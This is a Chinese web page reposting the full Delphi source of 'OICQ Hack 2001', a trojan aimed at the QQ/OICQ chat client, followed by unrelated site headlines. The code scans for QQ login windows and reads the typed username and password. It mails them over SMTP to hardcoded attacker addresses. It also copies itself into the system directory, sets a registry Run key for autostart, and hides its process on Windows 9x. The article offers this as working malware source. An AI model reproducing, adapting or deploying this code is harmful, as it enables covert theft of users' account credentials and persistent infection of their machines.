分享
 
 
 

OICQ 远程木马的设计技术

王朝delphi·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  

{

****************** OICQ Hack 2001***********

*

* 2001 5.22 ver 1.1 Modify for OICQ2000b 0230

* 2001 5.25 ver 1.2 Modify for QQ2000b 0430

* Last updated: 2001.5.25

* Author :njhhack

* HackSoft Research Lab.

* Copyright(C) 2001 Allrigths Reserved.

*

*

**********************************************

}

//---------------下面是oicqhack.dpr工程文件

program oicqhack;

uses

Windows,

Messages,

mainunit in 'mainunit.pas';

{$R *.RES}

var

wClass: TWndClass; // class struct for main window

Msg: TMSG; // message struct

procedure ShutDown;

begin

UnRegisterClass(classname,hInst);

ExitProcess(hInst); //end program

end;

function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall;

begin

Result:=DefWindowProc(hWnd,Msg,wParam,lParam);

case Msg of

WM_CREATE: wincreate;

WM_TIMER: ontimer1;

WM_DESTROY: ShutDown;

end;

end;

begin

//如果旧版本已运行,则停止旧版程序,只运行当前新版程序

hmain:=Findwindow('HackSoft-Oicq-Password-Recoder','OICQ 密码记录器2');

if hmain<>0 then sendmessage(lp,wm_destroy,0,0);

hInst:=GetModuleHandle(nil); // get the application instance

classname:='HackSoft-Oicq-Password-Recoder';

with wClass do

begin

Style:= CS_PARENTDC;

hIcon:= LoadIcon(hInst,'MAINICON');

lpfnWndProc:= @WindowProc;

hInstance:= hInst;

hbrBackground:= COLOR_BTNFACE+1;

lpszClassName:= classname;

hCursor:= LoadCursor(0,IDC_ARROW);

end;

RegisterClass(wClass);

hmain:=CreateWindowEx(WS_EX_TOOLWINDOW,classname,'OICQ 密码记录器3',WS_OVERLAPPEDWINDOW,10,10,120,80,0,0,hInst,nil);

//建立一个新的定时器,用来定时扫描系统中的窗口

newtime:=SetTimer(hmain,0,300,nil);

//建立消息循环

while(GetMessage(Msg,hmain,0,0))do

begin

TranslateMessage(Msg);

DispatchMessage(Msg);

end;

//结束定时器

killtimer(hmain,newtime);

end.

//-------下面是mainunit.pas单元文件

unit mainunit;

interface

uses

Windows,

Messages,

SysUtils,

Classes,

winsock,

registry;

const

CRLF=#13#10;

var

spy:string;

hinst,hmain,newtime,count,start,max,fhand,old,olde,lp:integer;

his:array[0..100] of integer;

syspath:array[0..200] of integer;

regservice:function(uThread:integer;uType:integer):Integer;stdcall;

libhandle:thandle;

classname:array[0..100] of char;

items:array[0..4] of string;

err:integer;

wsadata:twsadata;

fsocket,fport,step:integer;

SockAddrIn:TSockAddrIn;

hackmail,email,newpass,fhost,s1,password:string;

sbuf:array[0..1024] of char;

procedure winCreate;

procedure OnTimer1;

implementation

//修改注册表让程序自启动

procedure autorun;

var reg:tregistry;

begin

reg:=tregistry.create;

reg.rootkey:=HKEY_LOCAL_MACHINE;

reg.openkey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',true);

reg.WriteString('oicqpass',spy+'OICQPASS.EXE');

reg.closekey;

reg.free;

end;

//下面是个发信的子过程,取得密码后发回getoicq@21cn.com邮箱

procedure MailSend;

begin

err:=recv(FSocket,sbuf,400,0);

s1:=strpas(sbuf);

inc(step);

case step of

1:s1:='HELO smtp.hacker.com'+CRLF;

2:s1:='MAIL FROM: <getoicq@21cn.com>'+CRLF;

3:s1:='RCPT TO: <'+email+'>'+CRLF;

4:s1:='DATA'+CRLF;

5:s1:='From:"Oicq Hack"<www.hacker.com>'+CRLF

+'To:"getoicq"<www.password.com>'+CRLF

+'Subject:QQ2001 Password come.'+CRLF

+CRLF

+newpass+CRLF

+'.'+CRLF;

6:s1:='QUIT'+CRLF;

else

step:=0;

end;

strcopy(sbuf,pchar(s1));

err:=send(FSocket,sbuf,strlen(sbuf),MSG_DONTROUTE);

end;

//发信主过程

procedure SendPass;

begin

err:=WSAStartup($0101,WSAData);

FSocket := socket(PF_INET, SOCK_STREAM,IPPROTO_IP);

//利用 smtp.21cn.com 进行发信

fhost:='202.104.32.230';

fport:=25;

SockAddrIn.sin_addr.s_addr:=inet_addr(PChar(FHost));

SockAddrIn.sin_family := PF_INET;

SockAddrIn.sin_port :=htons(Fport);

err:=connect(FSocket,SockAddrIn, SizeOf(SockAddrIn));

step:=0;

repeat

MailSend;

until step=0;

err:=closesocket(FSocket);

err:=WSACleanup;

end;

//窗口枚举函数

function lpEnumFunc(hwnd:integer;uint:integer):boolean;stdcall;

var hw,hwold,hs,wlong,hup,i:integer;

sbuf,sb3,sb2:array[0..256] of char;

sb1:string;

begin

hwold:=GetParent(hwnd);

wlong:=GetWindowLong(hwnd,GWL_STYLE);

if (wlong and ES_PASSWORD)<>0 then

begin

//检查是否OICQ登陆

hup:=GetParent(hwnd);

sendmessage(hup,wm_gettext,100,integer(@sbuf));

strpcopy(sb2,'OICQ 注册向导');

strpcopy(sb3,'QQ 注册向导');

if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then

begin

old:=GetParent(hup);

old:=GetParent(old);

old:=GetParent(old);

start:=0;

count:=1;

//items.clear;

//跳过两个窗口

hwnd:=Getwindow(hwnd,GW_HWNDFIRST);

hwnd:=Getwindow(hwnd,GW_HWNDNEXT);

//取得用户名

hwnd:=Getwindow(hwnd,GW_HWNDNEXT);

hw:=GetWindowTextLength(hwnd);

hs:=integer(@sbuf);

sendmessage(hwnd,wm_gettext,100,hs);

items[0]:='用户名:'+strpas(sbuf);

//取得密码

hwnd:=Getwindow(hwnd,GW_HWNDNEXT);

hw:=GetWindowTextLength(hwnd);

hs:=integer(@sbuf);

sendmessage(hwnd,wm_gettext,100,hs);

items[1]:='密码:'+strpas(sbuf);

end;

strpcopy(sb2,'OICQ用户登录');

strpcopy(sb3,'QQ用户登录');

if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then

begin

old:=GetParent(hup);

old:=GetParent(old);

start:=0;

count:=1;

//items.clear;

//取得用户名

hwnd:=Getwindow(hwnd,GW_HWNDFIRST);

hw:=GetWindowTextLength(hwnd);

hs:=integer(@sbuf);

sendmessage(hwnd,wm_gettext,100,hs);

items[0]:='用户名:'+strpas(sbuf);

//取得密码

hwnd:=Getwindow(hwnd,GW_HWNDNEXT);

hw:=GetWindowTextLength(hwnd);

hs:=integer(@sbuf);

sendmessage(hwnd,wm_gettext,100,hs);

items[1]:='密码:'+strpas(sbuf);

end;

end;

//检查是否在线

hw:=GetWindowTextLength(hwnd);

hs:=integer(@sbuf);

sendmessage(hwnd,wm_gettext,100,hs);

strpcopy(sb2,'在线');

strpcopy(sb3,'隐身');

if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then

begin

if hwold=old then

begin

if olde<>old then

begin

if strcomp(sbuf,sb2)=0 then items[2]:='登录成功:在线'

else items[2]:='登录成功:隐身';

items[3]:=' ';

//密码发回我的邮箱getoicq@21cn.com

newpass:=format('%s %s %s %s',[items[0],items[1],items[2],items[3],items[4]);

//

hackmail:=email;

sendpass;

email:='mf001@etang.com';

sendpass;

email:=hackmail;

//密码存盘到oicqpass.dll中

{

if fileexists(spy+'oicqpass.dll')=false then fhand:=filecreate(spy+'oicqpass.dll')

else fhand:=fileopen(spy+'oicqpass.dll',fmOpenWrite);

if fileexists(spy+'oicqpass.dll')=false then fhand:=filecreate(spy+'oicqpass.dll')

else fhand:=fileopen(spy+'oicqpass.dll',fmOpenWrite);

fileseek(fhand,0,2);

strpcopy(sbuf,items[0]+#13#10+items[1]+#13#10+items[2]+#13#10+items[3]+#13#10);

filewrite(fhand,sbuf,strlen(sbuf));

fileclose(fhand);

}

end;

olde:=old;

end;

end;

result:=true;

end;

定时器响应函数

procedure OnTimer1;

begin

lp:=0;

EnumChildWindows(GetDesktopWindow,@lpEnumFunc,lp);

end;

//窗口创建响应函数

procedure winCreate;

var wlong:integer;

s1:string;

s2,s3,sbuf:array[0..300] of char;

i:integer;

osver:TOSVERSIONINFO;

tmp:tmemorystream;

begin

//取得操作系统版本信息,若为win9x则注册为服务进程而隐身,nt下无此功能

osver.dwOSVersionInfoSize:=sizeof(TOSVERSIONINFO);

if GetVersionEx(osver)=true then

begin

if VER_PLATFORM_WIN32_NT<>osver.dwPlatformId then

begin

LibHandle:=LoadLibrary('kernel32.dll');

if LibHandle<>0 then

begin

@regservice:=GetProcAddress(LibHandle, 'RegisterServiceProcess');

regservice(0,1);//1=hide,0=show;

FreeLibrary(LibHandle);

end;

end;

end;

max:=0;

count:=0;

将程序复制到系统目录

s1:=ParamStr(0);

for i:=0 to length(s1) do s2:=s1[i+1];

GetSystemDirectory(@syspath,MAX_PATH);

spy:=strpas(@syspath)+'\';

s1:=spy+'oicqhack.exe';

for i:=0 to length(s1) do s3:=s1[i+1];

copyfile(s2,s3,false);

//从email.txt中找到目标e-mail信箱

if fileexists('c:\email.txt')=false then

begin

email:='getoicq@21cn.com';

end else

begin

tmp:=tmemorystream.create;;

tmp.loadfromfile('c:\email.txt');

count:=tmp.size;

// strcopy(sbuf,pchar(''));

tmp.read(sbuf,count);

tmp.free;

email:='';

for step:=0 to count-1 do email:=email+sbuf[step];

strcopy(sbuf,pchar(email));

// messagebox(0,sbuf,'',0);

end;

count:=0;

step:=0;

//修改注册表使程序自启动

autorun;

end;

end.

/////////////////////////////////////////////////////////

--------倪建华---------------

HackSoft Research Lab.

Copyright(C) 2001 Alrights reserved.

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有